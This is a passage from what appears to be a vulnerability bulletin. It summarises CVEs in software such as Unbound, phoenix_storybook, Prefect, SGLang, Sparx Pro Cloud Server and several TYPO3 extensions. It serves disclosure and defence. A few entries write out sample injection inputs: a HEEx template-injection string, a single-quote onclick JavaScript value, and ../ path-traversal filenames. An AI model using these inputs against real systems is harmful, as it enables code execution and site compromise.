NLnet Labs–Unbound NLnet Labs Unbound up to and including version 1.25.0 has a denial of service vulnerability in the DNSSEC validator that can lead to a crash given malicious upstream replies. When Unbound constructs chase-reply messages for validation, the code uses the wrong counter to calculate write offsets for ADDITIONAL section rrsets. DNAME duplication could increase the ANSWER section count and authority filtering could decrease the AUTHORITY section count and create an uninitialized array slot. Combining these two, the validator later dereferences this uninitialized pointer, causing an immediate process crash. An adversary controlling a DNSSEC-signed domain can trigger this bug with a single query by configuring a DNAME chain with unsigned CNAMEs and a response containing unsigned AUTHORITY records alongside signed ADDITIONAL glue records. Unbound 1.25.1 contains a patch with a fix to use the proper counters to calculate the write offsets. 2026-05-20 not yet calculated CVE-2026-42959 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42959.txt
 
NLnet Labs–Unbound NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to poisoning via promiscuous records for the authority section. Promiscuous RRSets that complement DNS replies in the authority section can be used to trick Unbound to cache such records. If an adversary is able to attach such records in a reply (i.e., spoofed packet, fragmentation attack) he would be able to poison Unbound’s cache. A malicious actor can exploit the possible poisonous effect by injecting RRSets other than NS that are also accompanied by address records in a reply, for example MX. This could be achieved by trying to spoof a reply packet or fragmentation attacks. Unbound would then accept the relative address records in the additional section and cache them if the authority RRSet has enough trust at this point, i.e., in-zone data for the delegation point. Unbound 1.25.1 contains a patch with a fix that disregards address records from the additional section if they are not explicitly relevant only to authority NS records, mitigating the possible poison effect. This is a complement fix to CVE-2025-11411. 2026-05-20 not yet calculated CVE-2026-42960 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42960.txt
 
NLnet Labs–Unbound NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability when handling replies with very large RRsets that Unbound needs to perform name compression for. Malicious upstream responses with very large RRsets with records that don’t share a suffix above the root can cause Unbound to spend a considerable time applying name compression to downstream replies. This can lead to degraded performance and eventually denial of service in well orchestrated attacks. An adversary can exploit the vulnerability by querying Unbound for the specially crafted contents of a malicious zone with very large RRsets. Before Unbound replies to the query it will try to apply name compression which was an unbounded operation that could lock the CPU until the whole packet was complete. A compression limit was introduced in 1.21.1 for this but it didn’t account for the case where records would not share any suffix above the root. That causes Unbound to go in a different code path because of the compression tree lookup failure and eventually not increment the compression counter for those operations. Unbound 1.25.1 contains a patch with a fix that increments the compression counter regardless of the compression tree lookup. This is a complement fix to CVE-2024-8508. 2026-05-20 not yet calculated CVE-2026-44390 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44390.txt
 
NLnet Labs–Unbound NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a locking inconsistency vulnerability that when certain conditions are met (multi-threaded, RPZ XFR reload, RPZ zone with ‘rpz-nsip’/’rpz-nsdname’ triggers) it could result in heap use-after-free and eventual crash. An adversary can exploit the vulnerability if conditions are first met on a vulnerable Unbound, i.e., multi-threaded, an RPZ zone with ‘rpz-nsip’/’rpz-nsdname’ triggers and an ongoing XFR for that RPZ zone. Local RPZ files do not trigger the vulnerability. If the timing is right and an XFR happens at the same time another thread needs to read that RPZ zone, the reader may not hold the lock long enough and the thread applying the XFR may free objects that the reader is about to walk causing the use-after-free. Unbound 1.25.1 contains a patch with a fix to the locking code. 2026-05-20 not yet calculated CVE-2026-44608 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44608.txt
 
NOVUS–AirGate 4G Incorrect access control in the /uci/get/ endpoint of NOVUS AirGate 4G firmware v1.1.16 allows unauthenticated attackers to obtain administrator credentials via a crafted POST request. 2026-05-18 not yet calculated CVE-2023-24215 http://airgate.com
http://novus.com
https://github.com/sql3t0/cve-disclosures/blob/main/00_-_CVE-2023-24215.md
 
Offline Hospital Management System–Offline Hospital Management System 5.3.0 Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands. 2026-05-18 not yet calculated CVE-2026-26462 https://sourceforge.net/projects/hospital-management-system/files/
https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4
 
OpENer–OpENer v2.3-558-g1e99582 OpENer v2.3-558-g1e99582 contains an out-of-bounds read vulnerability in the Common Packet Format (CPF) parser, specifically in CreateCommonPacketFormatStructure() in source/src/enet_encap/cpf.c. A crafted ENIP/CPF message can supply an attacker-controlled item_count value that is not consistently validated against the remaining data_length of the CPF slice. 2026-05-18 not yet calculated CVE-2026-38719 https://github.com/EIPStackGroup/OpENer
https://github.com/EIPStackGroup/OpENer/issues/558
 
Perforce–P4 (Helix Core) A Remote Code Execution vulnerability in P4 (Helix Core) Server’s Command-Line Client, prior to the 2025.2 Patch 2, has been fixed to address potential security risks. 2026-05-18 not yet calculated CVE-2026-6902 https://portal.perforce.com/s/cve/a91Qi000002zJB3IAM/code-injection-in-perforce-helix-core
 
phenixdigital–phoenix_storybook Authorization Bypass Through User-Controlled Key vulnerability in phenixdigital phoenix_storybook allows cross-session PubSub topic injection via a URL query parameter. ‘Elixir.PhoenixStorybook.Story.ComponentIframeLive’:handle_params/3 in lib/phoenix_storybook/live/story/component_iframe_live.ex reads a PubSub topic directly from params[“topic”] and broadcasts {:component_iframe_pid, self()} on it with no check that the topic belongs to the requesting session. The shared PhoenixStorybook.PubSub is used to coordinate playground LiveViews with their iframes: a playground subscribes to a session-specific topic and uses the received iframe pid to direct subsequent control messages (variation state, theme switches, extra-assign payloads) via send/2. Because the iframe trusts the query parameter, an attacker who loads /storybook/iframe/<story>?topic=<victim_topic> causes their iframe process pid to be announced on the victim’s topic. The victim’s playground then addresses its private messages to the attacker’s iframe process. This issue affects phoenix_storybook from 0.4.0 before 1.1.0. 2026-05-20 not yet calculated CVE-2026-47068 https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-mrhx-6pw9-q5fh
https://cna.erlef.org/cves/CVE-2026-47068.html
https://osv.dev/vulnerability/EEF-CVE-2026-47068
https://github.com/phenixdigital/phoenix_storybook/commit/6ee03f1c738d4436dde1b066cf65c80663d489f5
 
phenixdigital–phoenix_storybook Code Injection vulnerability in phenixdigital phoenix_storybook allows unauthenticated remote code execution via unsanitized attribute value interpolation in HEEx template generation. The psb-assign WebSocket event handler in ‘Elixir.PhoenixStorybook.Story.PlaygroundPreviewLive’:handle_event/3 accepts arbitrary attribute names and values from unauthenticated clients. These values are passed to ‘Elixir.PhoenixStorybook.Helpers.ExtraAssignsHelpers’:handle_set_variation_assign/3, which stores them verbatim. When rendering, ‘Elixir.PhoenixStorybook.Rendering.ComponentRenderer’:attributes_markup/1 interpolates binary attribute values directly into a HEEx template string as name=”<val>” without escaping double quotes or HEEx expression delimiters. An attacker can supply a value containing a closing quote followed by a HEEx expression block (e.g. foo” injected={EXPR} bar=”), which causes EXPR to be treated as an inline Elixir expression. The resulting template is compiled via EEx.compile_string/2 and executed via Code.eval_quoted_with_env/3 with full Kernel imports and no sandbox, giving the attacker arbitrary code execution on the server. This issue affects phoenix_storybook from 0.5.0 before 1.1.0. 2026-05-20 not yet calculated CVE-2026-8467 https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-55hg-8qxv-qj4p
https://cna.erlef.org/cves/CVE-2026-8467.html
https://osv.dev/vulnerability/EEF-CVE-2026-8467
https://github.com/phenixdigital/phoenix_storybook/commit/56ab8464d4375fa52db806148a06cce126ad481d
 
phenixdigital–phoenix_storybook Allocation of Resources Without Limits or Throttling vulnerability in phenixdigital phoenix_storybook allows unauthenticated denial-of-service via BEAM atom table exhaustion. Multiple LiveView event handlers convert user-supplied event parameter strings to atoms using String.to_atom/1 without validation: ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:handle_set_variation_assign/3 interns every key of the psb-assign params map; ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:handle_toggle_variation_assign/3 interns the “attr” value from psb-toggle events; ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:to_variation_id/2 interns elements of “variation_id”; and ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:to_value/4 interns raw string values for attributes declared as :atom or :boolean. BEAM atoms are never garbage-collected, so each unique attacker-controlled string is a permanent allocation. Once the atom table ceiling (~1,048,576 atoms) is reached, the entire BEAM node aborts, taking down all applications running on it. This issue affects phoenix_storybook from 0.2.0 before 1.1.0. 2026-05-20 not yet calculated CVE-2026-8469 https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-833p-95jq-929q
https://cna.erlef.org/cves/CVE-2026-8469.html
https://osv.dev/vulnerability/EEF-CVE-2026-8469
https://github.com/phenixdigital/phoenix_storybook/commit/96d524690af0fe197a49f60d18e564a620b9ef81
 
prefecthq–prefecthq/prefect A vulnerability in the `GitHubRepository` block of the `prefect-github` integration in Prefect version 3.6.18 allows an attacker to inject arbitrary git command-line options via the `reference` field. The `reference` field is concatenated directly into a `git clone` command string without proper sanitization, and then parsed by `shlex.split()`. This enables injection of options such as `-c`, leading to potential Server-Side Request Forgery (SSRF), credential theft, or remote code execution (RCE). The vulnerability affects both the `aget_directory()` and `get_directory()` methods in `src/integrations/prefect-github/prefect_github/repository.py`. This issue does not affect the GitLab and BitBucket integrations, which use a safer list-based command construction approach. 2026-05-24 not yet calculated CVE-2026-3515 https://huntr.com/bounties/f3b048b8-7f4e-45ef-a5a7-cb841c39acde
 
PrestaShop–upsshipping module An issue in prestashop upsshipping all versions through at least 2.4.0 allows a remote attacker to obtain sensitive information via the /modules/upsshipping/logs/ and /modules/upsshipping/lib/UPSBaseApi.php components. 2026-05-18 not yet calculated CVE-2026-39079 https://labs.esokia.com/cve/cve-2026-39079/
 
Rocket.Chat–Rocket.Chat The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content. 2026-05-19 not yet calculated CVE-2026-32994 https://hackerone.com/reports/3713682
 
RRWO–Crypt::SaltedHash Crypt::SaltedHash versions through 0.09 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography. 2026-05-20 not yet calculated CVE-2026-47372 https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes
https://github.com/robrwo/perl-Crypt-SaltedHash/commit/9b68437d2cd420b819b3a795474c3870338d38d5.patch
 
RRWO–Crypt::SaltedHash Crypt::SaltedHash versions through 0.09 for Perl are susceptible to timing attacks. These versions use Perl’s built-in eq comparison. Discrepancies in timing could be used to guess the underlying hash. 2026-05-20 not yet calculated CVE-2026-47373 https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes
https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch
 
RRWO–Net::Statsd::Lite Net::Statsd::Lite versions through 0.10.0 for Perl allowed metric injections. The values from the set_add method were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Note that version 0.9.0 fixed a similar issue CVE-2026-46719 for metric names. 2026-05-18 not yet calculated CVE-2026-8788 https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.10.1/changes
https://www.cve.org/CVERecord?id=CVE-2026-46719
 
ScadaBR–ScadaBR In ScadaBR version 1.2.0, a Missing Authentication for Critical Function vulnerability could allow an unauthenticated attacker to send HTTP GET requests to the SCADA system and inject arbitrary sensor readings. 2026-05-19 not yet calculated CVE-2026-8602 https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03
 
ScadaBR–ScadaBR In ScadaBR version 1.2.0, an OS Command Injection vulnerability could allow an attacker to execute commands as root on the SCADA system. 2026-05-19 not yet calculated CVE-2026-8603 https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03
 
ScadaBR–ScadaBR In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim’s session by luring any logged-in user to a malicious webpage. 2026-05-19 not yet calculated CVE-2026-8604 https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03
 
ScadaBR–ScadaBR In ScadaBR version 1.2.0, a Use of Hard-Coded Credentials vulnerability could allow an attacker to access the SCADA system as admin. 2026-05-19 not yet calculated CVE-2026-8605 https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03
 
scalar–astro v0.1.13 scalar/astro v0.1.13 was discovered to contain an arbitrary file upload vulnerability in the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows attackers to execute arbitrary code via uploading a crafted SVG file. 2026-05-19 not yet calculated CVE-2026-30117 https://github.com/prassan10/XSS-Open-Redirect-via-scalar_url
 
scalar–astro v0.1.13 scalar/astro v0.1.13 was discovered to contain a Server-Side Request Forgery (SSRF) in the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows unauthenticated attackers to force the backend server to send HTTP requests to attacker-controlled URLs, leading to authentication cookies and headers exposure and possible privilege escalation. 2026-05-19 not yet calculated CVE-2026-30118 https://github.com/prassan10/ssrf-zero-click-ato-scalar
 
SGLang–SGLang SGLang’s multimodal generation runtime scheduler’s ROUTER socket binds to 0.0.0.0 by default and contains a sink that calls pickle.loads() on incoming messages, enabling RCE when exposed to the internet. 2026-05-18 not yet calculated CVE-2026-7301 https://github.com/sgl-project/sglang/tree/main/python/sglang
https://antiproof.ai/blog/three-rces-in-sglang/
 
SGLang–SGLang SGLang’s multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints. 2026-05-18 not yet calculated CVE-2026-7302 https://github.com/sgl-project/sglang/tree/main/python/sglang
https://antiproof.ai/blog/three-rces-in-sglang/
 
SGLang–SGLang SGLang’s multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation. 2026-05-18 not yet calculated CVE-2026-7304 https://github.com/sgl-project/sglang/tree/main/python/sglang
https://antiproof.ai/blog/three-rces-in-sglang/
 
Siber Systems, Inc.–Android App “RoboForm Password Manager” Android App “RoboForm Password Manager” provided by Siber Systems, Inc. handles Android intents without sufficient URL validation, user confirmation or notification. If a URL to some malicious web page is given through an intent, RoboForm may silently download files without user confirmation or notification. 2026-05-20 not yet calculated CVE-2026-47782 https://play.google.com/store/apps/details?id=com.siber.roboform
https://www.roboform.com/news-android
https://jvn.jp/en/vu/JVNVU93461473/
 
simplesamlphp–simplesamlphp-module-casserver SimpleSAMLphp-casserver is a CAS 1.0 and 2.0 compliant CAS server in the form of a SimpleSAMLphp module. In versions below 6.3.1 and 7.0.0, the logout endpoint accepts a url query parameter to redirect to. casserver treats that url as trusted, and either (depending on configuration) redirects the browser there, or shows a “you’ve been logged out” page with a link to continue to that url. Impacted configs include ‘enable_logout’ => true, and ‘skip_logout_page’ -> true. This issue has been resolved in versions 6.3.1 and 7.0.0. 2026-05-18 not yet calculated CVE-2025-65954 https://github.com/simplesamlphp/simplesamlphp-module-casserver/security/advisories/GHSA-cvrm-5hp6-h523
https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/0462f50f00b3bb300d83067d11b74146a57bb8e0
https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/fb6c6f1c7b9e757c93c5c306e1d36405e64f6dc5
 
Six Apart Ltd.–Movable Type A missing authorization vulnerability exists in Movable Type. Under certain conditions, when a user without administrator privileges signs in to the product, unintended update processing may be executed. 2026-05-20 not yet calculated CVE-2026-44392 https://movabletype.org/news/2026/05/mt-908-released.html
https://www.sixapart.jp/movabletype/news/2026/05/20-1100.html
https://jvn.jp/en/jp/JVN66473735/
 
Sparx Systems–Enterprise Architect Sparx Enterprise Architect software has a security feature that limits users’ actions to those specified in the role. An authenticated attacker can modify the Enterprise Architect client behavior (e.g. using a debugger) and log in as any other user or administrator; it is then possible to make any change to the repository. The vendor was notified early about this vulnerability, but didn’t respond with the details of the vulnerability or the vulnerable version range. Only version 17.1 and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. 2026-05-19 not yet calculated CVE-2026-42098 https://cert.pl/en/posts/2026/05/CVE-2026-42096
https://sparxsystems.com/products/ea/
https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html
https://efigo.pl/blog/CVE-2026-42096/
 
Sparx Systems–Pro Cloud Server Sparx Pro Cloud Server is vulnerable to Broken Access Control within communication with the database. Due to a lack of permission checks, any low-privileged user can run arbitrary SQL queries within the database user context. The vendor was notified early about this vulnerability, but didn’t respond with the details of the vulnerability or the vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. 2026-05-19 not yet calculated CVE-2026-42096 https://cert.pl/en/posts/2026/05/CVE-2026-42096
https://sparxsystems.com/products/procloudserver/
https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html
https://efigo.pl/blog/CVE-2026-42096/
 
Sparx Systems–Pro Cloud Server Sparx Pro Cloud Server requires authentication based on the requested URL. An attacker can omit the “model” query parameter and send the model name only in the binary blob of the POST request, allowing SQL query execution without authentication. The vendor was notified early about this vulnerability, but didn’t respond with the details of the vulnerability or the vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. 2026-05-19 not yet calculated CVE-2026-42097 https://cert.pl/en/posts/2026/05/CVE-2026-42096
https://sparxsystems.com/products/procloudserver/
https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html
https://efigo.pl/blog/CVE-2026-42096/
 
Sparx Systems–Pro Cloud Server Sparx Pro Cloud Server is vulnerable to a Race Condition in the /data_api/dl_internal_artifact.php endpoint. The application downloads the properties of the object pointed to by the guid parameter and saves the loaded content in the current location (__DIR__) under the specified name. An attacker with repository access can control both the filename and file contents, allowing the creation of a malicious PHP file in the current directory. Although the file is deleted after processing, a race condition exists: if the response transmission is delayed (e.g., via a large file or slow client connection), the file remains accessible. During this window, the attacker can issue a second request to execute the malicious PHP file, resulting in remote code execution. The vendor was notified early about this vulnerability, but didn’t respond with the details of the vulnerability or the vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. 2026-05-19 not yet calculated CVE-2026-42099 https://cert.pl/en/posts/2026/05/CVE-2026-42096
https://sparxsystems.com/products/procloudserver/
https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html
https://efigo.pl/blog/CVE-2026-42096/
 
Sparx Systems–Pro Cloud Server Improper Handling of Syntactically Invalid Structure in Sparx Pro Cloud Server allows a Denial of Service (DoS) attack to be executed by sending a specially crafted SQL query. This causes the Pro Cloud Server service to terminate unexpectedly. The vendor was notified early about this vulnerability, but didn’t respond with the details of the vulnerability or the vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. 2026-05-19 not yet calculated CVE-2026-42100 https://cert.pl/en/posts/2026/05/CVE-2026-42096
https://sparxsystems.com/products/procloudserver/
https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html
https://efigo.pl/blog/CVE-2026-42096/
 
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a crafted HEIF sequence file where the saiz box declares more samples than actually exist in the track’s chunk table causes a heap-buffer-overflow (out-of-bounds read) in the SampleAuxInfoReader constructor. The SampleAuxInfoReader constructor iterates over saiz->get_num_samples() samples but doesn’t validate that this count is consistent with the number of chunks in the chunks vector. When saiz declares more samples than the chunks cover, the loop increments current_chunk past chunks.size(), causing an out-of-bounds read on the chunks vector. The vulnerability is triggered during file parsing (heif_context_read_from_file) without any additional user interaction. Any application using libheif to open untrusted HEIF files is affected. This issue has been fixed in version 1.22.0. 2026-05-22 not yet calculated CVE-2026-41071 https://github.com/strukturag/libheif/security/advisories/GHSA-xj92-xjff-h8w3
https://github.com/strukturag/libheif/releases/tag/v1.22.0
 
TCHATZI–Authen::TOTP Authen::TOTP versions before 0.1.1 for Perl generate secrets using rand. Secrets were generated using Perl’s built-in rand function, which is predictable and unsuitable for security usage. 2026-05-21 not yet calculated CVE-2026-46473 https://metacpan.org/release/TCHATZI/Authen-TOTP-0.1.1/changes
https://github.com/tchatzi/Authen-TOTP/commit/d04f30cc6538d77fc6b6d550da450cf3017b8561.patch
 
The Qt Company–Qt An Uncontrolled Search Path Element vulnerability in the OpenSSL TLS backend of Qt Network (qtbase) in Qt Qt Framework (Unix) allows a local attacker to load a rogue CA certificate as a trusted system authority via a crafted certificate file placed in the application’s working directory. 2026-05-19 not yet calculated CVE-2025-14575 Gerrit: QSslCertificate::fromPath — reject empty path strings (Qt 6.9.2+)
 
Thermo Fisher–Scientific Torrent Suite Dx Thermo Fisher Scientific Torrent Suite Dx through 5.14.2 has a privilege escalation vulnerability that may allow an authenticated user with limited access privileges to gain unauthorized administrator-level privileges through exploitation of specific system interfaces. 2026-05-18 not yet calculated CVE-2026-41085 https://thermofisher.com
https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/TorrentSuiteDxSoftware_v5_14_2.pdf
 
tinyMQTT–tinyMQTT In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service. 2026-05-18 not yet calculated CVE-2025-56352 https://github.com/JustDoIt0910/tinyMQTT/issues/19
 
TODDR–Template::Plugin::HTML Template::Plugin::HTML versions through 3.102 for Perl allow HTML and JavaScript to be injected. The html_filter function did not escape single quotes, so HTML attributes enclosed in single quotes could have code injected. For example, the variable "var" in <a id='ref' title='[% var | html %]'> would not be properly escaped. An attacker could insert some limited HTML and JavaScript, for example, var = "' onclick='while (true) { alert(1) }'". Note that arbitrary HTML and JavaScript would be difficult to inject, because angle brackets, ampersands and double quotes would still be escaped. 2026-05-19 not yet calculated CVE-2026-5090 https://github.com/abw/Template2/issues/327
https://github.com/abw/Template2/pull/337/changes/11c78a7a771d4af505efeb754a0b8775689c2eae
 
TP-Link Systems Inc.–Archer AX72 (SG) v1.0 In the web management interface of Archer AX72 (SG) v1, the network diagnostic feature improperly handles invalid user input, resulting in limited exposure of diagnostic command usage information. An authenticated attacker with administrative privileges could exploit this issue to confirm the presence of the diagnostic utility and view its valid command-line syntax and options. The exposed information is limited in scope and does not include sensitive system data. 2026-05-19 not yet calculated CVE-2026-5511 https://www.tp-link.com/sg/support/download/archer-ax72/#Firmware
https://www.tp-link.com/us/support/faq/5096/
 
TP-Link Systems Inc.–Archer RE650 v1 An authentication logic vulnerability in multiple TP-Link range extenders allows an unauthenticated attacker on an adjacent network to manipulate a login parameter and reset the administrator password due to insufficient validation. Successful exploitation allows an attacker to obtain full administrative control of the affected device, potentially impacting confidentiality, integrity, and availability. 2026-05-22 not yet calculated CVE-2026-3294 https://www.tp-link.com/en/support/download/re650/v1/#Firmware
https://www.tp-link.com/us/support/download/re650/v1/#Firmware
https://www.tp-link.com/us/support/download/re305/v1/#Firmware
https://www.tp-link.com/en/support/download/re305/v1/#Firmware
https://www.tp-link.com/us/support/download/re360/v1/#Firmware
https://www.tp-link.com/en/support/download/re360/v1/#Firmware
https://www.tp-link.com/us/support/download/tl-wa860re/v4/#Firmware
https://www.tp-link.com/en/support/download/tl-wa860re/v4/#Firmware
https://www.tp-link.com/en/support/download/re580d/#Firmware
https://www.tp-link.com/us/support/download/re580d/#Firmware
https://www.tp-link.com/us/support/faq/5101/
 
Trend Micro, Inc.–TrendAI Apex One (Mac) An origin validation error vulnerability in the Trend Micro Apex One (mac) agent iCore service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). 2026-05-21 not yet calculated CVE-2025-71214 https://success.trendmicro.com/en-US/solution/KA-0022458
https://www.zerodayinitiative.com/advisories/ZDI-26-139/
 
Trend Micro, Inc.–TrendAI Apex One (Mac) A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent iCore service signature verification could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). 2026-05-21 not yet calculated CVE-2025-71215 https://success.trendmicro.com/en-US/solution/KA-0022458
https://www.zerodayinitiative.com/advisories/ZDI-26-141/
 
Trend Micro, Inc.–TrendAI Apex One (Mac) A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent cache mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). 2026-05-21 not yet calculated CVE-2025-71216 https://success.trendmicro.com/en-US/solution/KA-0022458
https://www.zerodayinitiative.com/advisories/ZDI-26-142/
 
Trend Micro, Inc.–TrendAI Apex One (Mac) An origin validation error vulnerability in the Trend Micro Apex One (mac) agent self-protection mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). 2026-05-21 not yet calculated CVE-2025-71217 https://success.trendmicro.com/en-US/solution/KA-0022458
https://www.zerodayinitiative.com/advisories/ZDI-26-143/
 
Trimble–SketchUp A cross-site scripting (XSS) vulnerability in SketchUp 2026’s Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser. 2026-05-22 not yet calculated CVE-2026-9264 https://trust.trimble.com/?tcuUid=52252bc0-c196-4b1f-9f13-4e4c9ba247d9
 
TYPO3–Extension “Address List” The AddressRepository::getSqlQuery() method constructs a database query without properly sanitizing user input, leading to SQL Injection. The method is not invoked anywhere within the extension itself and therefore poses no direct risk in a default installation. However, custom extensions that call this method with untrusted input would expose the site to SQL injection. 2026-05-19 not yet calculated CVE-2026-8827 https://typo3.org/security/advisory/typo3-ext-sa-2026-012
 
TYPO3–Extension “Content Element Selector” The extension passes an attacker-controlled cookie directly to PHP’s unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with “Persistent Mode: Static” in the plugin settings. 2026-05-19 not yet calculated CVE-2026-46725 https://typo3.org/security/advisory/typo3-ext-sa-2026-013
 
TYPO3–Extension “Faceted Search” The OOXML parsing of the file indexer does not disable external entity resolution. A crafted xlsx or pptx document placed in an indexed directory can cause local files to be read or outbound HTTP requests to be performed, with the retrieved content being written to the search index. 2026-05-19 not yet calculated CVE-2026-46722 https://typo3.org/security/advisory/typo3-ext-sa-2026-011
 
TYPO3–Extension “Faceted Search” The additional_tables configuration of the page and tt_content indexers accepts arbitrary table and field names. A backend user with permission to edit indexer configurations can copy sensitive data from internal TYPO3 tables into the search index. 2026-05-19 not yet calculated CVE-2026-46723 https://typo3.org/security/advisory/typo3-ext-sa-2026-011
 
TYPO3–Extension “Faceted Search” The file indexer does not normalize the configured directory path. A backend user with permission to edit indexer configurations can index documents from arbitrary locations on the server file system through path traversal sequences. 2026-05-19 not yet calculated CVE-2026-46724 https://typo3.org/security/advisory/typo3-ext-sa-2026-011
 
TYPO3–Extension “Frontend User Registration” The create and edit flows do not restrict which user properties may be submitted and do not enforce access control on the frontend user group assignment. As a result, an attacker can assign an arbitrary frontend user group to a newly registered or edited account, gaining unauthorized access to content and functionality restricted to privileged frontend user groups. 2026-05-19 not yet calculated CVE-2026-46721 https://typo3.org/security/advisory/typo3-ext-sa-2026-009
 
TYPO3–Extension “News system” The extension fails to properly sanitize user input before using it in a database query. As a result, an unauthenticated attacker can inject arbitrary SQL through a URL parameter on pages using the “Date Menu of news articles” plugin. Exploitation requires the “Date Menu of news articles” plugin to be in use and the TypoScript/Plugin setting disableOverrideDemand not to be enabled. 2026-05-19 not yet calculated CVE-2026-8726 https://typo3.org/security/advisory/typo3-ext-sa-2026-010
 
TYPO3–Extension “Site Crawler” The Crawler extension passes the X-T3Crawler-Meta response header from crawled URLs directly to PHP’s unserialize(). An attacker controlling a crawled endpoint can inject arbitrary serialized PHP objects, leading to Remote Code Execution on the TYPO3 server. Exploitation requires administrative privileges to configure a crawler-enabled page and trigger the crawl via a Scheduler task. 2026-05-19 not yet calculated CVE-2026-8727 https://typo3.org/security/advisory/typo3-ext-sa-2026-008
 
Unknown–Ajax Load More The Ajax Load More WordPress plugin before 7.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. 2026-05-18 not yet calculated CVE-2026-6495 https://wpscan.com/vulnerability/c52f28c5-547d-48ae-89dd-edcdaeadcec5/
 
